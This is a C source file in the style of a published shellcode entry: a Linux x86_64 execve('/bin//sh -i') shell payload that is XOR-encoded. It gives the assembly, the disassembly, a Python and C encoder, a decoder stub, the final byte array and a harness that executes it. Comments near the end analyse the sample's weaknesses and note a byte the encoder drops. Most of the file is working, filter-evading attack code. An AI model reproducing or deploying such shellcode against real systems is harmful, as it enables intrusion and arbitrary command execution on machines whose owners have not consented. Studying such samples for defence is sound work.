/*
# Title     : Linux x86_64 XOR encode execve("/bin//sh",{"//bin/sh","-i",NULL},NULL) shellcode
# Date      : 31-05-2016
# Author    : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
*/

/*
main code
------------------------

section .text
global _start

_start:
    xor rax,rax
    xor rdx,rdx
    push rax
    push rax
    mov [rsp],dword '//bi'
    mov [rsp+4],dword 'n/sh'
    mov rdi,rsp
    push rax
    push rax
    mov [rsp],word '-i'
    mov rsi,rsp
    push rdx
    push rsi
    push rdi
    mov rsi,rsp
    add rax,59
    syscall

Disassembly
------------------

Disassembly of section .text:

0000000000400080 <_start>:
  400080: 48 31 c0                xor    %rax,%rax
  400083: 48 31 d2                xor    %rdx,%rdx
  400086: 50                      push   %rax
  400087: 50                      push   %rax
  400088: c7 04 24 2f 2f 62 69    movl   $0x69622f2f,(%rsp)
  40008f: c7 44 24 04 6e 2f 73    movl   $0x68732f6e,0x4(%rsp)
  400096: 68
  400097: 48 89 e7                mov    %rsp,%rdi
  40009a: 50                      push   %rax
  40009b: 50                      push   %rax
  40009c: 66 c7 04 24 2d 69       movw   $0x692d,(%rsp)
  4000a2: 48 89 e6                mov    %rsp,%rsi
  4000a5: 52                      push   %rdx
  4000a6: 56                      push   %rsi
  4000a7: 57                      push   %rdi
  4000a8: 48 89 e6                mov    %rsp,%rsi
  4000ab: 48 83 c0 3b             add    $0x3b,%rax
  4000af: 0f 05                   syscall
*/

/*
encoder
--------------

I used a Python script and a C program to encode the shellcode.

python script
---------------------

a="\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\x66\xc7\x04\x24\x2d\x69\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
print "shellcode length %d"%len(a)
a=a[::-1]
for i in range(len(a)-1):
    print a[i].encode('hex')

C program
-----------------

#include <stdio.h>
#include <stdlib.h>

main(int i,char *a[])
{
    if(i!=2)
    {
        printf("Usage %s \n",a[0]);
        return 0;
    }
    FILE *f,*o;
    f=fopen(a[1],"r");
    int shell;
    o=fopen("shellencode.txt","w");
    if(!f || !o )
    {
        perror("FILE I/O error: ");
        return 0;
    }
    while( (fscanf(f,"%x",&shell)) !=EOF )
    {
        printf("%.2x\n",shell);
        fprintf(o,"%#.2x,",shell^0x90); //0x90 is seed key
        fflush(o);
    }
    fclose(o);
    fclose(f);
    return 0;
}
---------------------------------------------------------------------------------------------------------------------------------
I am sorry that my Python script is very poor. Search the internet for a better XOR encoder Python script.

My Python script reverses the shellcode. Then COPY & paste the reversed shellcode into a file; then I use the C program
to encode the reversed shellcode and write it to shellencode.txt
-----------------------------------------------------------------------------------------------------------------------------
*/

/*
decoder
---------------

section .text
global _start

_start:
    jmp shellcode

decoder:
    pop rsi
    xor rcx,rcx
    mov cl,49
    cdq
    mov dl,0x90        ;seed key

decode:
    xor rax,rax
    mov al,[rsi]
    xor al,dl
    dec rsp
    mov [rsp],byte al
    inc rsi
    loop decode
    call rsp

shellcode:
    call decoder
    db 0x95,0x9f,0xab,0x50,0x13,0xd8,0x76,0x19,0xd8,0xc7,0xc6,0xc2,0x76,0x19,0xd8,0xf9,0xbd,0xb4,0x94,0x57,0xf6,0xc0,0xc0,0x77,0x19,0xd8,0xf8,0xe3,0xbf,0xfe,0x94,0xb4,0xd4,0x57,0xf9,0xf2,0xbf,0xbf,0xb4,0x94,0x57,0xc0,0xc0,0x42,0xa1,0xd8,0x50,0xa1

Disassembly
-------------------

Disassembly of section .text:

0000000000400080 <_start>:
  400080: eb 1d                   jmp    40009f

0000000000400082 :
  400082: 5e                      pop    %rsi
  400083: 48 31 c9                xor    %rcx,%rcx
  400086: b1 31                   mov    $0x31,%cl
  400088: 99                      cltd
  400089: b2 90                   mov    $0x90,%dl

000000000040008b :
  40008b: 48 31 c0                xor    %rax,%rax
  40008e: 8a 06                   mov    (%rsi),%al
  400090: 30 d0                   xor    %dl,%al
  400092: 48 ff cc                dec    %rsp
  400095: 88 04 24                mov    %al,(%rsp)
  400098: 48 ff c6                inc    %rsi
  40009b: e2 ee                   loop   40008b
  40009d: ff d4                   callq  *%rsp

000000000040009f :
  40009f: e8 de ff ff ff          callq  400082
  4000a4: 95                      xchg   %eax,%ebp
  4000a5: 9f                      lahf
  4000a6: ab                      stos   %eax,%es:(%rdi)
  4000a7: 50                      push   %rax
  4000a8: 13 d8                   adc    %eax,%ebx
  4000aa: 76 19                   jbe    4000c5
  4000ac: d8 c7                   fadd   %st(7),%st
  4000ae: c6 c2 76                mov    $0x76,%dl
  4000b1: 19 d8                   sbb    %ebx,%eax
  4000b3: f9                      stc
  4000b4: bd b4 94 57 f6          mov    $0xf65794b4,%ebp
  4000b9: c0 c0 77                rol    $0x77,%al
  4000bc: 19 d8                   sbb    %ebx,%eax
  4000be: f8                      clc
  4000bf: e3 bf                   jrcxz  400080
<_start>
  4000c1: fe                      (bad)
  4000c2: 94                      xchg   %eax,%esp
  4000c3: b4 d4                   mov    $0xd4,%ah
  4000c5: 57                      push   %rdi
  4000c6: f9                      stc
  4000c7: f2 bf bf b4 94 57       repnz mov $0x5794b4bf,%edi
  4000cd: c0 c0 42                rol    $0x42,%al
  4000d0: a1                      .byte 0xa1
  4000d1: d8 50 a1                fcoms  -0x5f(%rax)
*/

/* The shellcode decoder.asm is the encoded shellcode */

/*
 * Decoder stub (36 bytes, 0x400080-0x4000a3 in the listing above) followed by
 * the 48 encoded payload bytes from the `db` line of decoder.asm.  The stub
 * locates its data with the jmp/call/pop sequence, XORs every byte with the
 * fixed key 0x90 held in dl, stores each result one byte below the previous
 * one under rsp, and finishes with `call rsp`.
 *
 * Notes for anyone analysing this sample:
 *  - The decoded bytes are written to, and then executed from, the stack.
 *    A non-executable stack (the default on current toolchains) faults at
 *    the `call rsp`; the sample depends on that mitigation being absent.
 *  - A single fixed XOR key leaves both the key (`b2 90`) and the decode loop
 *    in the clear, so the original payload is recoverable statically without
 *    running anything.
 *  - `mov cl,49` matches the original payload length, but only 48 encoded
 *    bytes are embedded: the Python encoder's `range(len(a)-1)` drops the
 *    original leading 0x48 byte.  In this harness the 49th byte read is the
 *    implicit NUL that terminates the array; it decodes to 0x90 (nop) and is
 *    the byte rsp points at when `call rsp` runs, so the decoded sequence
 *    starts `nop; xor eax,eax; xor rdx,rdx` rather than the original
 *    `xor rax,rax; xor rdx,rdx`.
 */
char shellcode[]="\xeb\x1d\x5e\x48\x31\xc9\xb1\x31\x99\xb2\x90\x48\x31\xc0\x8a\x06\x30\xd0\x48\xff\xcc\x88\x04\x24\x48\xff\xc6\xe2\xee\xff\xd4\xe8\xde\xff\xff\xff\x95\x9f\xab\x50\x13\xd8\x76\x19\xd8\xc7\xc6\xc2\x76\x19\xd8\xf9\xbd\xb4\x94\x57\xf6\xc0\xc0\x77\x19\xd8\xf8\xe3\xbf\xfe\x94\xb4\xd4\x57\xf9\xf2\xbf\xbf\xb4\x94\x57\xc0\xc0\x42\xa1\xd8\x50\xa1";

/*
 * Test harness: casts the byte array to a function pointer and calls into it.
 * argc/argv (i, a) are unused.  The array lives in writable data, which is not
 * mapped executable by default, so the call faults unless the build disables
 * that protection -- the harness only runs in a deliberately weakened
 * environment.  Nothing is returned explicitly; if the payload's execve fails
 * and control comes back, main falls off the end.
 */
int main(int i,char *a[])
{
    (* (int(*)()) shellcode)();
}